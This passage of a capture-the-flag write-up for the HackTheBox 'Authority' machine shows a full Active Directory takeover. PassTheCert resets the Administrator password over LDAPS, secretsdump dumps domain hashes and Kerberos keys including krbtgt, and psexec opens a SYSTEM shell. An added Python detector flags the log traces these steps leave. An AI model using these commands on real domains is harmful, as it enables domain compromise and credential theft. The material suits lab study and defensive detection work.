PassTheCert
┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ python3 PassTheCert/Python/passthecert.py -action ldap-shell -crt administrator.pub -key administrator.pri.decrypted -domain AUTHORITY.HTB -dc-ip $IP -port 636
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
#
The -action ldap-shell flag opens a custom LDAP shell session over LDAPS, authenticated with the certificate and key passed via -crt and -key:
# help
add_computer computer [password] - Adds a new computer to the domain with the specified password. Requires LDAPS.
add_user new_user [parent] - Creates a new user.
add_user_to_group user group - Adds a user to a group.
change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
clear_rbcd target - Clear the resource based constrained delegation configuration information.
disable_account user - Disable the user's account.
enable_account user - Enable the user's account.
dump - Dumps the domain.
search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
get_user_groups user - Retrieves all groups this user is a member of.
get_group_users group - Retrieves all members of a group.
get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
exit - Terminates this session.
#
While there are a lot of commands available, I will go with changing the password of the administrator user:
# change_password administrator Qwer1234
got user dn: CN=Administrator,CN=Users,DC=authority,DC=htb
attempting to set new password of: Qwer1234
Password changed successfully!
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ impacket-secretsdump 'administrator:Qwer1234@$IP' -target-ip $IP -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x31f4629800790a973f9995cec47514c6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a15217bb5af3046c87b5bb6afa7b193e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
HTB\AUTHORITY$:aes256-cts-hmac-sha1-96:ec22cd5a1be00cba22bdb085dc87b01d33fa7c6d75cb7433b1baf03d5e3d5e78
HTB\AUTHORITY$:aes128-cts-hmac-sha1-96:9eb68cf803ce5d245d71d0c3494f01c6
HTB\AUTHORITY$:des-cbc-md5:b9d5dcc20e7a97f4
HTB\AUTHORITY$:plain_password_hex:12b28d718a78af2bef5cad6cd64ab7655e01b8876d7b27be22e7307a1776d26ede7dc48760bd71ae070233c4581f6398b90d8f5384a5081f4909e187baf6f47af0a80b3cbc264f5c638d0ae29503af0b8baa98fb57e83b633f88b0579021c87195dd9238ccfa8f18195c61e551f183f51bd21e189508bc45d07712053569a285d6f75c566b9ad417fefced685fa570a952641f1fd6838013bf61835fe6ac024a5e0273d1eedf8819aa00b0850e281e8d83abbf2b4edd8b42fafc8370b263e1ffb1d8edbcdca3bbe75e1f5d6dd8da560a08f5ac8d42b75a6a306c8f5b5f2e96203e935b06e05d9611b7f8be58f24cce97
HTB\AUTHORITY$:aad3b435b51404eeaad3b435b51404ee:5f2d84fb5e44ccaddb52c672b9578fcb:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd5d60027f85b1132cef2cce88a52670918252114
dpapi_userkey:0x047c1e3ad8db9d688c3f1e9ea06c8f2caf002511
[*] NL$KM
0000 F9 41 4F E3 80 49 A5 BD 90 2D 68 32 F7 E3 8E E7 .AO..I...-h2....
0010 7F 2D 9B 4B CE 29 B0 E6 E0 2C 59 5A AA B7 6F FF .-.K.)...,YZ..o.
0020 5A 4B D6 6B DB 2A FA 1E 84 09 35 35 9F 9B 2D 11 ZK.k.*....55..-.
0030 69 4C DE 79 44 BA E1 4B 5B BC E2 77 F4 61 AE BA iL.yD..K[..w.a..
NL$KM:f9414fe38049a5bd902d6832f7e38ee77f2d9b4bce29b0e6e02c595aaab76fff5a4bd66bdb2afa1e840935359f9b2d11694cde7944bae14b5bbce277f461aeba
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bd6bd7fcab60ba569e3ed57c7c322908:::
svc_ldap:1601:aad3b435b51404eeaad3b435b51404ee:6839f4ed6c7e142fed7988a6c5d0c5f1:::
pe:11605:aad3b435b51404eeaad3b435b51404ee:8e4ddd3c6c2934d48495c75a68049bbc:::
AUTHORITY$:1000:aad3b435b51404eeaad3b435b51404ee:5f2d84fb5e44ccaddb52c672b9578fcb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:b0f8d5ffb7e88ea6e56131a297fac584caffd61fed505b2c1b544b21a4eda6a0
Administrator:aes128-cts-hmac-sha1-96:c2a42cca87ab4a8c4efb5d774291911c
Administrator:des-cbc-md5:43945b1cefdce331
krbtgt:aes256-cts-hmac-sha1-96:1be737545ac8663be33d970cbd7bebba2ecfc5fa4fdfef3d136f148f90bd67cb
krbtgt:aes128-cts-hmac-sha1-96:d2acc08a1029f6685f5a92329c9f3161
krbtgt:des-cbc-md5:a1457c268ca11919
svc_ldap:aes256-cts-hmac-sha1-96:3773526dd267f73ee80d3df0af96202544bd2593459fdccb4452eee7c70f3b8a
svc_ldap:aes128-cts-hmac-sha1-96:08da69b159e5209b9635961c6c587a96
svc_ldap:des-cbc-md5:01a8984920866862
pe:aes256-cts-hmac-sha1-96:8e63c9189e253ace1e2ed05c7b7402416b9dfcc1cd91b98428e69065c5faf62e
pe:aes128-cts-hmac-sha1-96:45fae4bfd3f1ed127158fa4ba78a06e3
pe:des-cbc-md5:5d1f3751c8321aae
AUTHORITY$:aes256-cts-hmac-sha1-96:ec22cd5a1be00cba22bdb085dc87b01d33fa7c6d75cb7433b1baf03d5e3d5e78
AUTHORITY$:aes128-cts-hmac-sha1-96:9eb68cf803ce5d245d71d0c3494f01c6
AUTHORITY$:des-cbc-md5:895d670dd3310bc2
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ impacket-psexec 'administrator:Qwer1234@$IP' -target-ip $IP -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.11.222.....
[*] Found writable share ADMIN$
[*] Uploading file kFmPkvrb.exe
[*] Opening SVCManager on 10.10.11.222.....
[*] Creating service Ghqh on 10.10.11.222.....
[*] Starting service Ghqh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4644]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
authority
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::210
ipv6 address. . . . . . . . . . . : dead:beef::1fff:856d:2473:8cb6
link-local ipv6 address . . . . . : fe80::7835:2a6c:98a0:6a63%8
ipv4 address. . . . . . . . . . . : 10.10.11.222
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%8
10.10.10.2
System Level Compromise
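As an added, defender-side example (not part of the original writeup), the following Python flags the host-side traces the three tool runs above leave on the DC: RemoteRegistry being started for secretsdump, the 4724 password-reset event produced by change_password, and the psexec service/binary pair (Ghqh and kFmPkvrb.exe dropped into ADMIN$). The events are constructed samples shaped like Windows System and Security log fields; the field names and the name patterns are assumptions.

```python
import re
from typing import Iterable, List, Optional

# Constructed sample events (not real logs from the box), modelled on the
# artefacts visible in the session above: RemoteRegistry started for
# secretsdump, the administrator password reset over LDAPS, and psexec
# dropping a randomly named .exe into ADMIN$ and registering it as a service.
SAMPLE_EVENTS = [
    {"log": "System", "id": 7036, "ServiceName": "Remote Registry", "State": "running"},
    {"log": "Security", "id": 4724, "SubjectUserName": "Administrator",
     "TargetUserName": "Administrator"},
    {"log": "System", "id": 7045, "ServiceName": "Ghqh",
     "ImagePath": "%SystemRoot%\\kFmPkvrb.exe", "StartType": "demand start"},
    {"log": "System", "id": 7045, "ServiceName": "Sysmon64",
     "ImagePath": "C:\\Windows\\Sysmon64.exe", "StartType": "auto start"},
    {"log": "System", "id": 7036, "ServiceName": "Remote Registry", "State": "stopped"},
]

# psexec-style naming as seen above: a short all-alphabetic service name and an
# 8-letter mixed-case binary placed directly under the Windows directory.
RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(r"(?:%SystemRoot%|\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one event, or None if it looks benign."""
    if event["id"] == 7045:  # System: a service was installed
        if RANDOM_SERVICE.match(event["ServiceName"]) and RANDOM_BINARY.search(event["ImagePath"]):
            return f"psexec-like service {event['ServiceName']} -> {event['ImagePath']}"
    elif event["id"] == 7036:  # System: service state change
        if event["ServiceName"] == "Remote Registry" and event["State"] == "running":
            return "RemoteRegistry started (remote SAM/LSA secrets access?)"
    elif event["id"] == 4724:  # Security: an attempt was made to reset a password
        return f"password reset of {event['TargetUserName']} by {event['SubjectUserName']}"
    return None


def scan(events: Iterable[dict]) -> List[str]:
    """Run classify() over an event stream and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```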